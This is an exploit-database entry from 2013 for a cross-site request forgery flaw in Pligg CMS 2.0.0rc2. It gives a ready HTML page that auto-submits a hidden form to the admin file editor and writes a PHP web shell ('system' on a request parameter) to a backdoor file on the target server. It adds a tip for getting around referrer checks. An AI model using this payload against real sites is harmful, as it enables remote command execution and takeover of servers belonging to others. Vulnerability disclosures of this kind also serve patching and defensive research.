Pligg CMS 2.0.0rc2 - Cross-Site Request Forgery (File Creation)
Author: DaOne
type: webapps
platform: php
port:
date_added: 2013-08-15
date_updated: 2013-08-16
verified: 1
codes: OSVDB-96307
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt28000/screen-shot-2013-08-16-at-100441-am.png
application_url: http://www.exploit-db.compligg-cms-2.0.0rc2.zip
---------------------------------------------------
# Exploit Title: Pligg CMS - CSRF Vulnerability
# Author: DaOne
# Vendor Homepage: http://pligg.com/
# Download link: https://github.com/Pligg/pligg-cms/archive/2.0.0rc2.zip
# Category: webapps/php
# Version: 2.0.0rc2 + old versions
---------------------------------------------------
-Create File by CSRF Exploit-
<html>
<body onload="document.form.submit();">
<form action="http://[target]/pligg/admin/admin_editor.php" method="post" name="form">
<input type="hidden" name="updatedfile" value="<?php system($_REQUEST['cmd']); ?>">
<input type="hidden" name="the_file2" value="/var/www/html/pligg/backd00r.php">
<input type="hidden" name="isempty" value="1">
<input type="hidden" name="save" value="Save+Changes">
</form>
</body>
</html>
# Exploit-DB Note:
# If getting a Wrong Referrer error, use Live HTTP Headers or Tamper Date plugin
# to mitigate the issue.